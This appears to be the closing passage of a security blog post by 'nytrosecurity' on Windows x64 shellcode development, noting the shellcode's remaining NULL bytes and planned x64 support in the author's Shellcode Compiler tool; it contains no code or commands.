The shellcode is far from being optimized and it also contains NULL bytes. However, both of these limitations can be fixed.

Shellcode development is fun, and switching from x86 to x64 is needed, because x86 will not be used much in the future.

Of course, I will add support for Windows x64 in Shellcode Compiler.

If you have any question, please add a comment or contact me.

nytrosecurity
